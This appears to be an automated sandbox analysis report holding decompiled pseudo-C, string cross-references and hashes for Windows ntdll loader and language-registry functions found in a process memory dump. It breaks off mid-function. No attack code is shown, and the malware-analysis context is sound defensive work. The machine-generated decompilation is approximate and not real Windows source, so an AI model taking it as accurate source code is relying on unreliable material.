0x00000000
0x03731708
0x0373170a
0x0373170c
0x0373171c
0x0373171c
0x0373171d
0x0373171f
0x03731727
0x00000000
0x03731727
0x0373170e
0x0373170e
0x03731715
0x00000000
0x03731715
0x037316cc
0x036e9a45
0x036e9a45
0x036e9a0e
0x036e9a1c
0x036e9a23
0x0373167e
0x0373167f
0x03731681
0x03731683
0x03731684
0x00000000
0x03731684
0x00000000
0x036e9aad
0x036e9aad
0x036e9ab0
0x036e9ab3
0x036e9ab3
0x036e9ab6
0x00000000
0x00000000
0x036e9ab8
0x036e9aba
0x036e9abc
0x036e9ac8
0x036e9ac8
0x00000000
0x036e9abe
0x036e9abe
0x036e9ac0
0x00000000
0x036e9ac0
0x036e9abc
0x036e9ad2
0x00000000
0x036e9ad2
0x036e9aab

Strings

HEAP: , xrefs: 0373155D, 03731624, 037317C9, 03731912
HEAP[%wZ]: , xrefs: 03731550, 03731617, 037317BC, 03731905
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03731572, 03731639, 037317DE, 03731927

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: a0114251c306c48146971fa3c77d677a1ea3511387c8f81794a8f7508763e23b
Instruction ID: d5f9530338047f6f8e9785e4966621b1ac5745c00c36de38dd47b68b1143b84a
Opcode Fuzzy Hash: a0114251c306c48146971fa3c77d677a1ea3511387c8f81794a8f7508763e23b
Instruction Fuzzy Hash: 0F221370A002419FDB24EF68C885B7AFBF5EF46704F2885ADE8568B342E775D885CB50

Uniqueness

Uniqueness Score: -1.00%

Function 036D8794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E036D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E036D934A() != 0) {
								_t159 = E0374A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x37b5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E03745510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x37b5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E036D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E036D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E036D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x37b5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x37b5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E036E2280(_t92, 0x37b86cc);
															_t94 = E03799DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E036F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x37b5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E036D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x37b5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x37b5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0370F380(_t136, 0x36a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E036E2280(_t108, 0x37b86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E036F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E03799D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E036DFFB0(_t118, _t156, 0x37b86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03709A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x036d8799
0x036d879d
0x036d87a1
0x036d87a3
0x036d87a8
0x036d87c3
0x036d87c3
0x036d87c8
0x036d87d1
0x036d87d4
0x036d87d8
0x036d87e5
0x036d87ec
0x03729bfe
0x03729c00
0x03729c02
0x03729c08
0x03729c0d
0x03729c0f
0x03729c14
0x03729c2d
0x03729c32
0x03729c37
0x03729c3a
0x03729c3c
0x03729c42
0x03729c42
0x03729c3c
0x03729c02
0x036d87da
0x036d87df
0x036d87e3
0x00000000
0x00000000
0x036d87e3
0x036d87f2
0x00000000
0x036d87fb
0x036d87fd
0x036d87fe
0x036d880e
0x036d880f
0x036d8810
0x036d8814
0x036d881a
0x036d881c
0x036d881f
0x036d8821
0x036d8822
0x036d8824
0x036d8826
0x036d882c
0x036d882e
0x03729c48
0x03729c48
0x036d8834
0x036d8834
0x036d8837
0x00000000
0x00000000
0x036d8837
0x036d882e
0x036d883d
0x036d8840
0x036d8843
0x036d8846
0x036d8849
0x036d884c
0x036d884e
0x036d8850
0x036d8852
0x036d8854
0x036d8857
0x036d88b4
0x036d88b6
0x036d88b6
0x036d8859
0x036d8859
0x036d8859
0x036d8861
0x036d8866
0x036d886a
0x036d893d
0x036d8941
0x00000000
0x036d8947
0x036d8947
0x036d894a
0x036d894c
0x00000000
0x036d8952
0x036d8955
0x036d895a
0x036d895d
0x036d895d
0x036d895f
0x036d8961
0x036d8961
0x036d8968
0x00000000
0x00000000
0x036d896a
0x036d896b
0x036d896e
0x00000000
0x036d8970
0x036d8970
0x036d8970
0x036d8970
0x036d8972
0x036d8972
0x036d8974
0x00000000
0x036d897a
0x036d897a
0x036d897d
0x00000000
0x036d8983
0x03729c65
0x03729c6d
0x03729c72
0x03729c75
0x03729c75
0x03729c82
0x03729c86
0x03729c87
0x03729c88
0x03729c89
0x03729c8c
0x03729c90
0x03729c95
0x03729c97
0x03729ca0
0x03729ca3
0x03729ca9
0x03729ca9
0x00000000
0x03729ca9
0x03729ca3
0x00000000
0x03729c97
0x036d897d
0x00000000
0x036d8974
0x036d8988
0x036d8992
0x036d8996
0x00000000
0x036d8996
0x036d894c
0x00000000
0x036d8870
0x036d887b
0x036d887d
0x036d887f
0x036d8881
0x036d8884
0x036d8884
0x036d8886
0x036d8889
0x036d888c
0x036d888e
0x036d8891
0x036d8891
0x036d8898
0x00000000
0x00000000
0x036d889a
0x036d889b
0x036d889e
0x00000000
0x00000000
0x036d88a0
0x036d88a8
0x036d88b0
0x036d88b2
0x036d88d3
0x036d88d5
0x00000000
0x036d88d7
0x036d88db
0x036d88dc
0x036d88e0
0x036d88e8
0x036d88ee
0x036d88f0
0x036d88f3
0x036d88fc
0x036d8901
0x036d8906
0x036d890c
0x036d890c
0x036d890f
0x036d8916
0x036d8917
0x036d8918
0x036d8919
0x036d891a
0x036d891f
0x036d8921
0x03729c52
0x03729c55
0x03729c5b
0x03729cac
0x03729cc0
0x03729cc0
0x03729c55
0x036d8927
0x036d8927
0x036d892f
0x036d8933
0x00000000
0x036d88f5
0x036d88f5
0x00000000
0x036d88f7
0x036d88f7
0x036d88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x036d88fa
0x036d88f5
0x036d88f3
0x00000000
0x036d88d5
0x00000000
0x036d88b2
0x036d88c9
0x00000000
0x036d88c9
0x036d887f
0x036d886a
0x036d8857
0x036d8852
0x036d88bf
0x036d88bf
0x036d87aa
0x036d87ad
0x036d87ae
0x036d87b4
0x036d87b5
0x036d87b6
0x036d87b8
0x036d87bd
0x036d87c1
0x036d87f4
0x036d87fa
0x00000000
0x00000000
0x00000000
0x036d87c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 03729C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03729C18
LdrpDoPostSnapWork, xrefs: 03729C1E

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 3da5f5e5d46ff9ed0469c037ed5a16b769ccd9b2122abe945f9dceeddc10d425
Instruction ID: c36f387265ffe71bc22cbc05bc9e8af04f6728d1f0c32a9b195315969f410400
Opcode Fuzzy Hash: 3da5f5e5d46ff9ed0469c037ed5a16b769ccd9b2122abe945f9dceeddc10d425
Instruction Fuzzy Hash: AE91F071E0021AEFDB18DF59C588ABEB7B9FF45310B0841A9E945AB241E730ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 036D7E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E036D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E036DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E036CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x37b5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03745510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x37b5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E036E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E036E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03747016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E036E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E036E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03747016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E036FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E036CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x036d7e4c
0x036d7e50
0x036d7e55
0x036d7e58
0x036d7e5d
0x036d7e71
0x036d7f33
0x036d7e77
0x036d7e77
0x036d7e79
0x036d7e79
0x036d7e7e
0x036d7f45
0x03729848
0x00000000
0x03729848
0x036d7f4e
0x036d7f53
0x036d7f5a
0x00000000
0x00000000
0x0372985a
0x03729862
0x03729866
0x00000000
0x0372986c
0x00000000
0x0372986c
0x036d7e84
0x036d7e84
0x036d7e8d
0x03729871
0x036d7eb8
0x036d7ec0
0x036d7ec0
0x036d7e9a
0x0372987e
0x00000000
0x00000000
0x03729884
0x0372988b
0x037298a7
0x037298ac
0x037298b1
0x037298b6
0x037298b8
0x037298b8
0x037298b9
0x00000000
0x037298b9
0x036d7ea0
0x036d7ea7
0x00000000
0x00000000
0x036d7eac
0x036d7eb1
0x036d7ec6
0x036d7ed0
0x037298cc
0x036d7ed6
0x036d7ed6
0x036d7ed6
0x036d7ede
0x036d7ee3
0x037298e3
0x037298f0
0x03729902
0x037298f2
0x037298fb
0x037298fb
0x03729907
0x0372991d
0x0372991d
0x03729907
0x037298e3
0x036d7ef0
0x036d7f14
0x036d7f14
0x036d7f1e
0x03729946
0x036d7f24
0x036d7f24
0x036d7f24
0x036d7f2c
0x0372996a
0x03729975
0x03729975
0x0372997e
0x03729993
0x03729993
0x0372997e
0x00000000
0x036d7ef2
0x036d7efc
0x036d7f0a
0x036d7f0e
0x03729933
0x00000000
0x03729933
0x00000000
0x036d7f0e
0x00000000
0x00000000
0x00000000
0x036d7eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 03729891
minkernel\ntdll\ldrmap.c, xrefs: 037298A2
LdrpCompleteMapModule, xrefs: 03729898

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: f1e2d8b49e78e352470b8e41a5399b55d6d7abdbee4708d84e4b3cea64950967
Instruction ID: 037c73f7f9e1d24ad2f3ea0cecf606711484c51ae4e5369333e7dbc42704374f
Opcode Fuzzy Hash: f1e2d8b49e78e352470b8e41a5399b55d6d7abdbee4708d84e4b3cea64950967
Instruction Fuzzy Hash: F2510235A007849FDB21CF68C944B6ABBE4EF42320F0C06A9E9519B7E1D734ED01CB92

Uniqueness

Uniqueness Score: -1.00%

Function 036CE620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E036CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E036CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E037095D0();
						}
						if(_t78 != 0) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0370FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0370BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03709600();
					if(_t97 < 0) {
						goto L6;
					}
					E0370BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L036CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0370BB40(_t83, _t102 + 0x24, _t78);
								if(L036D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0370BB40(_t84, _t102 + 0x24, _t94);
									if(L036D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x036ce620
0x036ce628
0x036ce62f
0x036ce631
0x036ce635
0x036ce637
0x036ce63e
0x03725503
0x03725503
0x036ce64c
0x036ce64c
0x036ce651
0x00000000
0x00000000
0x036ce661
0x036ce665
0x0372542a
0x036ce715
0x036ce71a
0x036ce71c
0x036ce720
0x036ce720
0x036ce727
0x036ce736
0x036ce736
0x036ce743
0x036ce743
0x036ce673
0x036ce678
0x036ce67d
0x036ce682
0x036ce685
0x036ce692
0x036ce69b
0x036ce6a3
0x036ce6ad
0x036ce6b1
0x036ce6b2
0x036ce6bb
0x036ce6bf
0x036ce6c0
0x036ce6c8
0x036ce6cc
0x036ce6d5
0x036ce6d9
0x00000000
0x00000000
0x036ce6e5
0x036ce6ea
0x036ce6f9
0x036ce70b
0x036ce70f
0x03725439
0x0372545e
0x0372545e
0x00000000
0x0372545e
0x0372543b
0x0372543e
0x03725440
0x03725445
0x03725472
0x03725475
0x0372548d
0x03725493
0x037254a9
0x00000000
0x00000000
0x037254ab
0x037254b4
0x037254bc
0x037254c8
0x037254de
0x037254fb
0x037254e0
0x037254e6
0x037254eb
0x037254eb
0x037254de
0x00000000
0x037254bc
0x03725477
0x0372547a
0x03725480
0x03725483
0x03725486
0x0372548b
0x00000000
0x00000000
0x00000000
0x0372548b
0x00000000
0x00000000
0x00000000
0x00000000
0x03725447
0x03725447
0x03725447
0x03725447
0x0372544e
0x00000000
0x00000000
0x03725450
0x03725452
0x03725455
0x0372545a
0x00000000
0x00000000
0x00000000
0x0372545c
0x0372546a
0x0372546d
0x0372546f
0x00000000
0x0372546f
0x036ce70f

Strings

InstallLanguageFallback, xrefs: 036CE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 036CE68C
@, xrefs: 036CE6C0

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 400064d7f07b3d3c7f09e552953d3f137b05af19921e77ea73c585437c849095
Instruction ID: 0bb405233ed5868a8783e5d971830a8f62429149c539a485bf9609a8fdce6e2f
Opcode Fuzzy Hash: 400064d7f07b3d3c7f09e552953d3f137b05af19921e77ea73c585437c849095
Instruction Fuzzy Hash: 2551DF765183559BC710DF65C444A7BF7E8EF89625F09092EF989DB240FB30DA04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0378E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0378E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0378BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0378BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0378AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
